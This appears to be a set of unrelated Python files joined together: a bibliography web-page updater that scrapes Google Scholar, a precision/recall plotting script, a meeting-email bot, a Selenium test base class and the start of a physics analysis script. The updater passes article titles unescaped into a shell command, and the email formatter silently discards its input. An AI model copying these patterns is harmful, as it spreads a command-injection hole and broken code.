USA, November 16-19, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>5</strong><strong><sup>th</sup></strong><strong>
International Workshop on Nanotechnology & Application</strong>, Vung Tau, Vietnam, November
11-14, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices</strong>, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology X</strong>, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on Engineering and Scientific
Innovations</strong>, Mar Ephraem College of Engineering & Technology, Elavuvilai,
Tamilnadu,
India, March 20-21, 2015<BR>
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Regional African Materials Research Society (AMRS)
Workshop</strong>, iThemba LABS, Somerset West, South Africa, December 3-4, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>African Laser Centre Annual Workshop</strong>, Rabat,
Morocco, November 3-5, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology IX</strong>, San Diego, CA, USA, August 17-21, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
& Devices VI</strong>, San Diego, CA, USA, August 17-21, 2014
</li>
<li><strong>L.J. Guo</strong>,<strong> 13<sup>th</sup> International Conference on Clean Energy
(ICCE2014)</strong>, Istanbul, Turkey, June 8-12, 2014
</li>
<li>
<strong>L.J. Guo</strong>,<strong> 6<sup>th</sup> International Conference on Applied
Energy (ICAE2014)</strong>, Taipei, Taiwan, May 30-June 2, 2014
</li>
<li><strong>L. Vayssieres</strong>, <strong>Nano & Giga Challenges in
Electronics</strong>,<strong>
Photonics and Renewable Energy: From Materials to Devices to System Architecture</strong>,
Symposium
and Spring School, Phoenix, Arizona, March 10-14, 2014
</li>
<li><strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology VIII</strong>, San Diego, CA, USA, August 25-29, 2013
</li>
<li><strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
&
Devices V</strong>, San Diego, CA, USA, August 25-29, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on</strong> <strong>Nanoscience
and
Nanotechnology: Lessons from Nature and Emerging Technologies</strong>, Ansal University,
Gurgaon,
India, July 25-26, 2013
</li>
<li>
<strong>L.J. Guo</strong>, <strong>1<sup>st</sup> Australia-China Joint Symposium on
Minerals</strong>,<strong> Metallurgy & Materials</strong>, Beijing, China, June 9-12,
2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>12<sup>th </sup>International Conference of Clean Energy
(ICCE 2012)</strong>, Xi'an, China, October 26-30, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>1<sup>st</sup> International Conference on Emerging
Advanced
Nanomaterials</strong>, Brisbane, Australia, October 22-25, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>4<sup>th </sup>International Symposium on Transparent
Conductive Materials</strong>, Hersonissos, Crete, Greece, October 21-26,
2012
</li>
<li>
<strong> L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
&
Devices IV</strong>, San Diego, CA, USA, August 12-16, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>20<sup>th</sup> International Conference on Composites
nano
or metals Engineering</strong>, Beijing, China, July 22-28, 2012
</li>
</ol>
</div>
</div>
<div id="backtothetop">
<a href="#top"><img src="images/assets/5.jpg" width="105" height="28" class="button"></a>
</div>
</div>
</div>
<div id="footer">
<div id="footeraddress">
<h3>International Research Center for Renewable Energy(IRCRE)</h3>
<ul>
<li>Tel: +86-29-82664664 Email: wangge2017@xjtu.edu.cn</li>
<li>No.28,Xianning West road,Xi'an,Shaanxi,710049 CHINA</li>
</ul>
</div>
<div id="copyright">
<p>Copyright 2019. All rights reserved</p>
</div>
</div>
<script src="./js/script.js"></script>
<script src="./js/statistics.js"></script>
</body>
</html>
'''
# 要解析的bib文件的路径
top15ArticleHtml = generateTop15ArtitleHtml(top15_bib_path)
articleHtml = generateAricleHtml(sorted_articles_bib_path)
bookHtml = generateBookHtml(others_bib_path)
proceedHtml = generateProceedHtml(others_bib_path)
editorialsHtml = generateEditorialsHtml(others_bib_path)
with open(researchnew_html_path, 'w', encoding='utf8') as htmlfile:
htmlfile.write(prebody + top15ArticleHtml +
articleHtml+bookHtml+proceedHtml+editorialsHtml + afterbody)
def main():
    """Run the IRCRE bibliography update pipeline end to end.

    The call order matters: classification must happen before sorting,
    sorting before the top-15 extraction, and merging before HTML
    generation.  Steps that are currently disabled are kept as
    commented-out calls so the full intended pipeline stays visible.

    Returns:
        0 on completion (used as the process exit code).
    """
    # openproxy()
    # Copy the bib files over from the website directory.
    # bibtexfilecopy()
    # Classify entries into article.bib, bookchapter.bib, ...
    bibtexclassify()
    # entryadd()
    # getclusterid()
    # Update citation counts.
    # getcitation()
    # Sort articles by impact factor and citation count, and extract the
    # top 15 most cited articles.
    articlessort()
    getop15articles()
    # Merge the classified files back into a single bibliography.
    ircrebibmerge()
    # updatestatistics()
    generatehtml()
    # filecopyback()
    return 0
def getcitation():
    """Refresh Google Scholar citation counts for a random sample of articles.

    Loads ``../bib7image/articles.bib``, picks 20 random entries, and for
    each one with a known Scholar cluster id asks scholar.py for the
    current citation count.  A new count is only accepted when it grew by
    fewer than 8 citations (a sanity check against bad scrapes).  The
    updated database is then dumped to cited-add-articles.bib (plus a temp
    copy) and written back to articles.bib after backing up the old file.

    Returns:
        0 on completion.
    """
    articlesparser = BibTexParser(common_strings=False)
    articlesparser.ignore_nonstandard_types = False
    with open('../bib7image/articles.bib', encoding='utf8') as articlesfile:
        articles_database = bibtexparser.load(articlesfile, articlesparser)
    articleentries = articles_database.entries
    import random
    # NOTE(review): only 20 randomly chosen entries are refreshed per run,
    # presumably to stay below Scholar's rate limits -- confirm.
    samplelist = random.sample(range(len(articleentries)), 20)
    print(samplelist)
    for i in samplelist:
        print("---------------------------")
        print("Entry number: " + str(i))
        title = articleentries[i]['title']
        clusterid = articleentries[i]['clusterid']
        print("Title: " + title)
        print("Cluster ID: " + clusterid)
        if not clusterid == "unknown":
            print(str(i))
            # scholar.py prints a "Citations <n>" line; the grep pipeline
            # isolates it and split()[-1] keeps just the number.
            try:
                citations = os.popen(
                    '''/usr/bin/python3 /home/limingtao/ircre-bibtex/ircreupdate/scholarpy/scholar.py -c 1 -C ''' + clusterid + ''' |grep -v list |grep Citations''').read().strip().split()[
                    -1]
            except:
                # Any scrape/parse failure is treated as an unknown count.
                citations = "unknown"
        else:
            citations = "unknown"
        print("new Citations: " + citations)
        if 'cited' in articleentries[i]:
            oldcitednumber = int(articleentries[i]['cited'])
        else:
            oldcitednumber = 0
        print("Old Cited Number: " + str(oldcitednumber))
        if not citations == "unknown":
            citednumber = int(citations)
            # Accept only counts that grew, and by fewer than 8 -- a large
            # jump is assumed to be a scraping error.
            if citednumber > oldcitednumber and ((citednumber - oldcitednumber) < 8):
                articleentries[i]['cited'] = str(citednumber)
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = ('order',)
    with open('/home/limingtao/ircre-bibtex/ircreupdate/cited-add-articles.bib', 'w', encoding='utf8') as newarticlefile:
        bibtexparser.dump(articles_database, newarticlefile, writer=writer)
    os.popen(
        "cp /home/limingtao/ircre-bibtex/ircreupdate/cited-add-articles.bib tempcited-add-articles.bib")
    # Keep a backup of the previous articles.bib before overwriting it.
    os.popen("cp /home/limingtao/ircre-bibtex/ircreupdate/articles.bib /home/limingtao/ircre-bibtex/ircreupdate/oldarticles.bib")
    with open('/home/limingtao/ircre-bibtex/ircreupdate/articles.bib', 'w', encoding='utf8') as newarticlefile:
        bibtexparser.dump(articles_database, newarticlefile, writer=writer)
    return 0
def entryadd(doi):
    """Stub: add a new bibliography entry for *doi* (not implemented yet)."""
    pass
def openproxy():
    """(Re)start the SSH proxy used for the Google Scholar queries.

    Looks for an already-running ssh process on port 9524, kills it if
    present, and then launches a fresh proxy via proxy.sh.

    Returns:
        0 on completion.
    """
    try:
        # Column 1 of `ps aux` output is the PID.  When no process
        # matches, the pipeline output is empty and split() yields [],
        # so indexing raises IndexError -- the only failure we expect.
        # (Previously a bare `except:` swallowed everything, including
        # KeyboardInterrupt.)
        sshid = os.popen(
            '''ps aux | grep 9524| grep ssh''').read().strip().split()[1]
    except IndexError:
        # No matching process: nothing to kill.
        sshid = None
    if sshid is not None:
        os.system('''kill ''' + sshid)
    os.system('''/home/limingtao/bin/proxy.sh''')
    return 0
def bibtexfilecopy():
    """Fetch ircre.bib and statistics.js from the live website directory.

    Each file is copied into the working directory and additionally saved
    under a date-stamped name (e.g. ircre2019415.bib) as a backup.

    Returns:
        0 on completion.
    """
    now = datetime.now()
    # Date stamp with no zero padding, e.g. "2019415" for 2019-04-15.
    stamp = '%d%d%d' % (now.year, now.month, now.day)
    website_bib = '/srv/main-websites/ircre/js/ircre.bib'
    website_stats = '/srv/main-websites/ircre/js/statistics.js'
    workdir = '/home/limingtao/ircre-bibtex/ircreupdate'
    # Pull the current bibliography and keep a dated backup copy.
    os.system(
        'cd ' + workdir + ';' +
        'cp ' + website_bib + ' ' +
        workdir + '/ -f ; cp ircre.bib ircre' + stamp + '.bib;')
    # Same for the statistics file.
    os.system(
        'cd ' + workdir + ';' +
        'cp ' + website_stats + ' ' +
        workdir + '/ -f ; cp statistics.js statistics' + stamp + '.js;')
    return 0
def getclusterid(title, author):
    """Look up missing Google Scholar cluster ids for article entries.

    Loads ``../bib7image/articles.bib`` and, for every entry whose
    ``clusterid`` field is the placeholder "unknown", queries scholar.py
    by exact title phrase and stores the returned cluster id.  The
    updated database is dumped to clusterid-added-ircre.bib (plus a temp
    copy).

    Args:
        title: unused; kept for call compatibility.
        author: unused; kept for call compatibility.

    Returns:
        0 on completion.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open('../bib7image/articles.bib', encoding='utf8') as article_file:
        article_database = bibtexparser.load(article_file, parser)
    # BUG FIX: this function previously referenced an undefined name
    # ``bib_database`` (NameError at runtime); the database loaded above
    # is ``article_database``, used consistently below.
    entries = article_database.entries
    print("---------------------------")
    print("---------------------------")
    print("---------------------------")
    print("Total articles number: " + str(len(entries)))
    print("---------------------------")
    print("---------------------------")
    print("---------------------------")
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = ('order',)
    for i in range(len(entries)):
        if entries[i]['clusterid'] == 'unknown':
            print("---------------------------")
            print("Entry number: " + str(i))
            entry_title = entries[i]['title']
            print("Title: " + entry_title)
            # scholar.py prints a "Cluster ID <id>" line; split()[-1]
            # keeps just the id.  Empty output (no match / scrape
            # failure) makes the final indexing raise IndexError.
            try:
                clusterid = os.popen(
                    '''/home/limingtao/ircre-bibtex/ircreupdate/scholarpy/scholar.py -c 1 -t --phrase="''' + entry_title + '''" |grep ID| grep Cluster''').read().strip().split()[
                    -1]
            except IndexError:
                clusterid = "unknown"
            print("new Cluster ID: " + clusterid)
            entries[i]['clusterid'] = clusterid
    with open('/home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib', 'w', encoding='utf8') as newbibfile:
        bibtexparser.dump(article_database, newbibfile, writer=writer)
    os.popen("cp /home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib /home/limingtao/ircre-bibtex/ircreupdate/tempclusterid-added-ircre.bib")
    with open('/home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib', 'w', encoding='utf8') as newbibfile:
        bibtexparser.dump(article_database, newbibfile, writer=writer)
    return 0
# Script entry point: run the update pipeline and use its result as the
# process exit status.
if __name__ == '__main__':
    sys.exit(main())
|
import sys
from collections import defaultdict
import matplotlib
from numpy import arange
import matplotlib.pyplot as plt
# --- Plot configuration -----------------------------------------------------
# Output file and figure geometry (inches).
output_file = 'external.pdf'
# NOTE(review): "Comparision" is misspelled, and this title is only used by
# an unused variable later in the script, so it is never rendered.
title = 'Comparision to external systems'
# NOTE(review): maxval appears to be unused in this script.
maxval = 70
width_in = 7
height_in = 2
# Where the per-run precision/recall files live, and which runs to plot.
data_dir = 'eval/qa/output/final'
datasets = ['webquestions', 'trec', 'wikianswers']
systems = ['system-full-uniontrain', 'sempre', 'paralex']
# Display names (LaTeX small caps) for each system.
system_names = {
    'system-full-uniontrain': r'\textsc{System}',
    'sempre': r'\textsc{Sempre}',
    'paralex': r'\textsc{Paralex}',
}
# Subplot titles for each dataset.
dataset_names = {
    'webquestions': 'WebQuestions',
    'trec': 'TREC',
    'wikianswers': 'WikiAnswers'
}
# Hand-tuned (x, y) axes coordinates for the in-plot curve labels.
label_position = {
    'system-full-uniontrain': {
        'webquestions': (.28, .39),
        'trec': (.25, .49),
        'wikianswers': (0.059, .20),
    },
    'paralex': {
        'webquestions': (0.16, .25),
        'trec': (0.09, .25),
        'wikianswers': (.027, .13),
    },
    'sempre': {
        'webquestions': (0.35, .57),
        'trec': (0.07, .15),
        'wikianswers': (0.013, .05),
    }
}
# Per-system line styling.
system_colors = {
    'system-full-uniontrain': 'blue',
    'sempre': 'red',
    'paralex': 'green',
}
system_linestyles = {
    'system-full-uniontrain': '-',
    'sempre': '-',
    'paralex': '-'
}
system_markers = {
    'system-full-uniontrain': ' ',
    'sempre': ' ',
    'paralex': ' '
}
# X-axis tick positions (in percent) per dataset.
dataset_recalls = {
    'webquestions': [0, 25, 50],
    'trec': [0, 15, 30],
    'wikianswers': [0, 4, 8]
}
# Use a LaTeX-rendered serif font to match the paper's typography.
font = {'family' : 'serif',
        'serif' : 'Computer Modern Roman',
        'size' : 9}
matplotlib.rc('font', **font)
matplotlib.rc('text', usetex=True)
def read_data(dataset, system):
    """Load a precision/recall curve and downsample it to 11 points.

    Reads ``pr-top.txt`` for the given dataset/system pair (two floats
    per line: recall, precision), drops the first 10 raw points, and then
    computes, at 11 evenly spaced recall levels, the best precision
    achievable at or above each recall -- i.e. the upper envelope of the
    PR curve.

    Returns:
        (recalls, precisions): two lists of equal length (n_points + 1).
    """
    path = '%s/%s/%s/pr-top.txt' % (data_dir, dataset, system)
    rs, ps = [], []
    # Use a context manager so the file handle is closed deterministically
    # (the original left it to the garbage collector).
    with open(path) as f:
        for line in f:
            r, p = [float(x) for x in line.strip().split()]
            rs.append(r)
            ps.append(p)
    # Skip the first 10 raw points (low-recall region).
    rs, ps = rs[10:], ps[10:]
    n_points = 10
    max_recall = max(rs)
    min_recall = min(rs)
    incr = (max_recall - min_recall) / n_points
    new_r, new_p = [], []
    # range() instead of the Python-2-only xrange(): iteration behaviour
    # is identical here and the module becomes Python-3 compatible.
    for i in range(n_points + 1):
        recall = min_recall + i*incr
        # Best precision among all raw points at recall >= this level.
        precision = max(p for (r,p) in zip(rs, ps) if r >= recall)
        new_r.append(recall)
        new_p.append(precision)
    return new_r, new_p
# ---------------------------------------------------------------------------
# Load every (dataset, system) PR curve, then draw one subplot per dataset.
# ---------------------------------------------------------------------------
data = defaultdict(dict)
for system in systems:
    for dataset in datasets:
        r, p = read_data(dataset, system)
        data[dataset][system] = (r, p)
fig = plt.figure(figsize=(width_in, height_in))
lines = []
for (i, dataset) in enumerate(datasets):
    ax = fig.add_subplot(1, 3, i+1)
    ax.set_title(dataset_names[dataset], fontsize=9, y=1.0)
    # Show only the left/bottom spines for a minimal frame.
    ax.xaxis.set_ticks_position('bottom')
    ax.yaxis.set_ticks_position('left')
    ax.spines['top'].set_color('none')
    ax.spines['left'].set_linewidth(0.5)
    ax.spines['right'].set_color('none')
    ax.spines['bottom'].set_linewidth(0.5)
    if i == 0:
        ax.set_ylabel('Precision')
    ax.set_xlabel('Recall')
    ax.yaxis.set_ticks([0, 0.50, 1.0])
    # BUG FIX: these labels are plain literals, not %-format strings, so
    # the old '0\\%%' kept a literal second '%', which usetex hands to
    # LaTeX as a comment character.  A single escaped percent (as in the
    # x-axis labels below, where '%%' IS consumed by %-formatting) is the
    # intended output.
    ax.yaxis.set_ticklabels(['0\\%', '50\\%', '100\\%'])
    for system in systems:
        r, p = data[dataset][system]
        line = ax.plot(r, p, lw=1, color=system_colors[system], linestyle=system_linestyles[system], marker=system_markers[system], markersize=3.5, markeredgecolor='none', markevery=3)
        lines.extend(line)
        # Label each curve directly inside the axes at a hand-tuned spot.
        lx, ly = label_position[system][dataset]
        ax.text(lx, ly, system_names[system], fontsize=8, color=system_colors[system])
    ax.set_ylim(0, 1)
    ax.xaxis.set_ticks([x/100.0 for x in dataset_recalls[dataset]])
    ax.xaxis.set_ticklabels([('%s\\%%' % x) for x in dataset_recalls[dataset]])
# NOTE(review): names and title_text are computed but never rendered
# (perhaps intended for a legend / fig.suptitle); kept for reference.
names = [system_names[n] for n in systems]
title_text = '{\\bf ' + title + '}'
fig.tight_layout()
plt.savefig(output_file)
|
import csv
import smtplib
from email.mime.text import MIMEText
from functions.utilities import variables as vrs
from functions.utilities import utils
from functions.utilities import directories as dr
from utilities import email_templates
from database import db_interface as db
def send_added_msgs(msg_dict, server):
    """
    Email each affected person a per-day summary of newly added meetings.

    :param msg_dict: dictionary where keys: names and values: lists of Meeting objects
    :param server: instance of an authenticated SMTP server
    :return: None
    """
    for name, meeting_list in msg_dict.items():
        # Group the meetings by day so each recipient gets one email per day.
        unique_days = {x.day for x in meeting_list}
        # Determine whether the name refers to an associate or a company;
        # the first meeting is representative for the whole list.
        name_type = ''
        first_meeting = meeting_list[0]
        if first_meeting.associate == name:
            name_type = 'associate'
        elif first_meeting.company == name:
            name_type = 'company'
        for day in unique_days:
            daily_meetings = [x for x in meeting_list if x.day == day]
            # Get full schedule for the day for that team or associate
            full_schedule = db.get_all_daily_schedules(name=name, name_type=name_type, day=day)
            if name == 'not_found':
                address_name = name
            else:
                address_name = dr.names_to_proper_names[name]
            # Load email template and populate with personalized info.
            # BUG FIX: str.replace returns a new string, so each result must be
            # reassigned -- the original code discarded it (and passed a list as
            # the substring to replace, which raises TypeError), so the raw
            # template was sent unmodified.
            msg = email_templates.added_meeting_msg
            # NOTE(review): _bulk_event_formatter reads dict keys via .get(),
            # while daily_meetings holds Meeting objects -- confirm the Meeting
            # type supports .get() or convert before calling.
            added_meeting_list = _bulk_event_formatter(daily_meetings)
            msg = msg.replace('[ADDED MEETING LIST]', ''.join(added_meeting_list))
            msg = msg.replace('[ADDRESS NAME]', address_name)
            msg = msg.replace('[DAY]', day)
            event_list = _bulk_event_formatter(full_schedule[name])
            if not event_list:
                msg = msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
            else:
                msg = msg.replace('[FULL MEETING LIST]', ''.join(event_list))
            to_addresses = dr.update_email_list[name]
            # Make the addresses into a list
            if not isinstance(to_addresses, list):
                to_addresses = [to_addresses]
            # Get the start times for added meetings of a given day
            meeting_start_times = [x.start_time for x in daily_meetings]
            if len(meeting_start_times) > 1:
                start_times = ', '.join(meeting_start_times)
            else:
                start_times = meeting_start_times[0]
            # Send an email to each person
            for addr in to_addresses:
                message = MIMEText(msg)
                message['From'] = 'mentor.madness.bot@gmail.com'
                message['To'] = addr
                message['Subject'] = 'New mentor meeting at ' + start_times + ' on '+ day
                server.send_message(message)
                print('Sent added email - ' + address_name + ' for ' + day)
def send_deleted_msgs(mtg_dict, server):
    """
    Email each affected person a per-day summary of cancelled meetings.

    :param mtg_dict: dictionary where keys: names and values: lists of Meeting objects
    :param server: instance of an authenticated SMTP server
    :return: None
    """
    for name, meeting_list in mtg_dict.items():
        # Group by day so each recipient gets one email per affected day.
        unique_days = {x.day for x in meeting_list}
        # Determine who the name corresponds to
        name_type = ''
        first_meeting = meeting_list[0]
        if first_meeting.associate == name:
            name_type = 'associate'
        elif first_meeting.company == name:
            name_type = 'company'
        for day in unique_days:
            daily_meetings = [x for x in meeting_list if x.day == day]
            # Get full schedule for the day for that team or associate
            full_schedule = db.get_all_daily_schedules(name=name, name_type=name_type, day=day)
            if name == 'not_found':
                address_name = name
            else:
                address_name = dr.names_to_proper_names[name]
            # Get email template and fill in the placeholders.
            # BUG FIX: str.replace returns a new string, so each result must be
            # reassigned -- the original discarded it (and passed a list as the
            # substring to replace, which raises TypeError), so the raw
            # template was sent unmodified.
            msg = email_templates.deleted_meeting_msg
            deleted_meeting_list = _bulk_event_formatter(daily_meetings)
            msg = msg.replace('[DELETED MEETING LIST]', ''.join(deleted_meeting_list))
            msg = msg.replace('[ADDRESS NAME]', address_name)
            msg = msg.replace('[DAY]', day)
            # Format the full schedule and insert that as well
            event_list = _bulk_event_formatter(full_schedule[name])
            if not event_list:
                msg = msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
            else:
                msg = msg.replace('[FULL MEETING LIST]', ''.join(event_list))
            to_addresses = dr.update_email_list[name]
            if not isinstance(to_addresses, list):
                to_addresses = [to_addresses]
            # Get the start times for the cancelled meetings, for the subject line
            meeting_start_times = [x.start_time for x in daily_meetings]
            if len(meeting_start_times) > 1:
                start_times = ', '.join(meeting_start_times)
            else:
                start_times = meeting_start_times[0]
            for addr in to_addresses:
                message = MIMEText(msg)
                message['From'] = 'mentor.madness.bot@gmail.com'
                message['To'] = addr
                message['Subject'] = 'Cancelled mentor meeting at ' + start_times + ' on '+ day
                server.send_message(message)
                print('Sent deleted email - ' + address_name + ' for ' + day)
def send_update_mail(added_mtg_dict, deleted_mtg_dict):
    """
    Notify everyone affected by schedule changes (additions first, then
    cancellations), then close the SMTP connection.

    :param added_mtg_dict: dict where keys: names w/ added meetings and values: lists of Meeting objects
    :param deleted_mtg_dict: dict where keys: names w/ deleted meetings and values: lists of Meeting objects
    :return: None
    """
    connection = _email_login()
    # Send both kinds of update over the same authenticated connection.
    send_added_msgs(added_mtg_dict, connection)
    send_deleted_msgs(deleted_mtg_dict, connection)
    # Close connection
    connection.quit()
def send_daily_mail(mtg_dict):
    """
    Send each person a summary email of tomorrow's meetings.

    :param mtg_dict: dict mapping names to lists of event dicts
    :return: None
    """
    server = _email_login()
    for key, events in mtg_dict.items():
        # BUG FIX: str.replace returns a new string, so the result must be
        # reassigned -- the original discarded it and mailed the raw template.
        msg = email_templates.daily_mail_msg
        event_list = _bulk_event_formatter(events)
        if not event_list:
            msg = msg.replace('[FULL MEETING LIST]', '\n\nNo meetings!')
        else:
            msg = msg.replace('[FULL MEETING LIST]', ''.join(event_list))
        to_addresses = dr.daily_email_list[key]
        # Normalize to a list so a single address and a list of addresses
        # share one send path (the original duplicated the send block).
        if not isinstance(to_addresses, list):
            to_addresses = [to_addresses]
        for addr in to_addresses:
            message = MIMEText(msg)
            message['From'] = 'mentor.madness.bot@gmail.com'
            message['To'] = addr
            message['Subject'] = 'Mentor meeting summary for tomorrow'
            server.send_message(message)
            print('Sent daily email to ' + key)
    server.quit()
def send_weekly_mail(mtg_dict):
    """
    Send each person a summary email of their meetings for the coming week.

    :param mtg_dict: dict mapping names to lists of event dicts
    :return: None
    """
    server = _email_login()
    for key, events in mtg_dict.items():
        # Assemble the message from greeting, meeting list, and footer.
        greeting = 'Hello ' + dr.names_to_proper_names[key] + ',\n\n' + \
                   'Here are your scheduled meetings for this week:\n\n'
        formatted = _bulk_event_formatter(events)
        body = ''.join(formatted) if formatted else 'No meetings!'
        footer = '\n\nThis represents the first draft for the week. Please check the main schedule if this is in error.\n\n' + \
                 '- Scheduling Bot'
        msg = greeting + body + footer
        # A recipient entry may be a single address or a list of addresses;
        # normalize to a list and send one message per address.
        recipients = dr.daily_email_list[key]
        if not isinstance(recipients, list):
            recipients = [recipients]
        for addr in recipients:
            message = MIMEText(msg)
            message['From'] = 'mentor.madness.bot@gmail.com'
            message['To'] = addr
            message['Subject'] = 'Mentor meeting summary for next week'
            server.send_message(message)
            print('Sent weekly email to ' + key)
    server.quit()
def make_daily_mentor_schedules(mentor_dict):
    """
    Generate a per-mentor daily schedule .txt file from the reminder template.

    :param mentor_dict: dict mapping mentor names to lists of event dicts
        (each event dict is expected to carry a 'day' key)
    :return: None -- writes one file per mentor under
        <LOCAL_PATH>/mentor_schedules/<day>/
    """
    for key, events in mentor_dict.items():
        day = events[0].get('day')
        # BUG FIX: str.replace returns a new string, so each result must be
        # reassigned -- the original discarded it and wrote the raw template.
        msg = email_templates.mentor_reminder_msg
        msg = msg.replace('[KEY]', key)
        msg = msg.replace('[DAY]', day)
        event_list = _bulk_event_formatter(events, for_mentors=True)
        if not event_list:
            full_meeting_list = 'No meetings!'
        else:
            full_meeting_list = ''.join(event_list)
        msg = msg.replace('[FULL MEETING LIST]', full_meeting_list)
        # Save message to a .txt file under a per-day directory with a
        # filesystem-safe name.
        dirname = day.replace(' ', '_').replace('/', '_')
        txt_name = key.replace(' ', '_').strip() + '.txt'
        filename = vrs.LOCAL_PATH + '/mentor_schedules/' + dirname + '/' + txt_name
        with open(filename, 'w') as file:
            file.write(msg)
def make_mentor_packet_schedules(mentor_dict):
    """
    Write an HTML schedule page per mentor for the printed mentor packet.

    :param mentor_dict: dict mapping mentor names to lists of event dicts
        (each event dict is expected to carry a 'day' key)
    :return: None -- writes one file per mentor under
        <LOCAL_PATH>/mentor_packet_schedules/<day>/
    """
    for mentor, events in mentor_dict.items():
        day = events[0].get('day')
        header = '<h1>' + mentor + '</h1><br/><br/>' + \
                 '<h2>Schedule - ' + day + '</h2><br/><br/>'
        formatted = _bulk_event_formatter(events, for_mentors=True)
        if formatted:
            page = header + '<br/><br/>'.join(formatted)
        else:
            page = header + 'No meetings!'
        # Save the page to a .html file under a per-day directory with a
        # filesystem-safe name.
        day_dir = day.replace(' ', '_').replace('/', '_')
        html_name = mentor.replace(' ', '_').strip() + '.html'
        out_path = vrs.LOCAL_PATH + '/mentor_packet_schedules/' + day_dir + '/' + html_name
        with open(out_path, 'w') as out_file:
            out_file.write(page)
def _email_login():
    """
    Helper function to log in to the gmail account for the Mentor
    Madness Bot and return an instance of the authenticated server.

    Credentials are read from the first row (username, password) of the
    stored CSV file <LOCAL_PATH>mm_bot_gmail_login.txt.

    :return: an instance of an authenticated SMTP server
    """
    # Get login credentials from stored file; use a context manager so the
    # handle is closed even if the file is empty/malformed (the original
    # leaked the handle on any exception before file.close()).
    login_file = vrs.LOCAL_PATH + 'mm_bot_gmail_login.txt'
    with open(login_file, 'r') as file:
        row = next(csv.reader(file))
    username = row[0]
    password = row[1]
    # Start email server; upgrade to TLS before sending credentials.
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(user=username, password=password)
    return server
def _bulk_event_formatter(event_list, for_mentors=False):
"""
:param event_list: list of Meeting objects
:param for_mentors: bool specifying if the meeting summary is for a mentor
:return: list of formatted strings, each summarizing a meeting
"""
# First check to see if the event dict list is made up only of headers.
# In this case, there are no actual events, so return an empty list
if not any(ed.get('start_time', False) for ed in event_list):
return []
event_list = []
for ed in event_list:
# Choose either mentor name or team name
if for_mentors:
room_subject = ed.get('company')
if room_subject:
room_subject = dr.names_to_proper_names[room_subject]
else:
room_subject = ed.get('mentor')
if ed.get('start_time') is None:
event_list.append('\n\n' + ed.get('day') + '\n')
else:
msg = '\n\t' + ed.get('start_time') + ' - ' + room_subject + \
'\n\t' + 'Room ' + ed.get('room_num') + ' (' + ed.get('room_name') + ')\n'
event_list.append(msg)
return event_list
|
# __author__ = 'wangyazhou'
# -*-coding:utf-8-*-
from .drivers import Browser
import unittest
import logging
import time
import json
import os
'''
=====================说明======================
功能:自定义unittest框架,编写公用函数setup(),tearDown()
================================================
'''
class MyTest(unittest.TestCase):
    """Custom unittest base class: overrides setUpClass/tearDownClass so that
    concrete test modules (test.py) inherit a shared browser fixture.
    """
    @classmethod
    def setUpClass(cls):
        """Pre-test preparation: read the browser type and base URL from
        data\\browser.json, launch the browser, open the site's home page,
        and set the window size.
        """
        # browser.json lives next to the test_case directory; backslashes in
        # the raw JSON are escaped before parsing so Windows paths survive.
        cls.path = os.path.dirname(__file__).split('test_case')[0] + r'data\browser.json'
        with open(cls.path) as f:
            t = json.loads(f.read().replace("\\", r"\\"))
        cls.browser_name = t['browser_name']
        cls.base_url = t['base_url']
        try:
            cls.driver = Browser(cls.browser_name).dr()
            # cls.driver.reset()
            cls.driver.implicitly_wait(8)
            cls.driver.get(cls.base_url)
            cls.driver.set_window_size(1024, 768)
        except BaseException as e:
            # Runtime messages intentionally left untranslated
            # ("failed to start the browser").
            print('启动浏览器失败!', e)
            logging.error('启动浏览器失败')
    @classmethod
    def tearDownClass(cls):
        """Post-test cleanup: wait briefly for pending operations, then quit
        the browser ("browser exited successfully" / "browser exit failed").
        """
        try:
            time.sleep(2)
            cls.driver.quit()
            logging.info('浏览器退出成功!')
        except BaseException as e:
            logging.error('浏览器退出失败!' + str(e))
if __name__ == '__main__':
    unittest.main()
|
#!/usr/bin/env python
''' Analysis script for standard plots
'''
#
# Standard imports and batch mode
#
import ROOT, os
ROOT.gROOT.SetBatch(True)
import itertools
from math import sqrt, cos, sin, pi, acos, cosh
from RootTools.core.standard import *
from TopEFT.Tools.user import plot_directory
from TopEFT.Tools.helpers import deltaPhi, getObjDict, getVarValue, deltaR, deltaR2
from TopEFT.Tools.objectSelection import getFilterCut
from TopEFT.Tools.cutInterpreter import cutInterpreter
from TopEFT.Tools.triggerSelector import triggerSelector
from TopEFT.samples.color import color
# for mt2ll
from TopEFT.Tools.mt2Calculator import mt2Calculator
mt2Calc = mt2Calculator()
#
# Arguments
#
import argparse
argParser = argparse.ArgumentParser(description = "Argument parser")
